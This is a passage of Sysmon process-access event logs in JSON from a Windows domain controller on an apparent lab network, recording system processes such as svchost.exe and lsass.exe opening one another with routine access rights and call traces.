C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+b920|C:\\Windows\\system32\\wbem\\wbemcore.dll+255ff|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+2685b|C:\\Windows\\system32\\wbem\\wbemcore.dll+22b78|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.678","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"4504","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22D2-5F25-0000-0010F3D41100}","TargetProcessId":"3308","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x101541","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+b920|C:\\Windows\\system32\\wbem\\wbemcore.dll+255ff|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+2685b|C:\\Windows\\system32\\wbem\\wbemcore.dll+22b78|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8565,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.678\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-22D2-5F25-0000-0010F3D41100}\r\nTargetProcessId: 3308\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.678","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-22D2-5F25-0000-0010F3D41100}","TargetProcessId":"3308","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8566,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.678\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-22D2-5F25-0000-0010F3D41100}\r\nTargetProcessId: 3308\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.678","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-22D2-5F25-0000-0010F3D41100}","TargetProcessId":"3308","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8567,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.678\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.678","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8568,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.678\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.678","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8569,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.678\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.678","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8570,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.703\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22D2-5F25-0000-0010F3D41100}\r\nTargetProcessId: 3308\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+602b3|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.703","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22D2-5F25-0000-0010F3D41100}","TargetProcessId":"3308","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+602b3|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
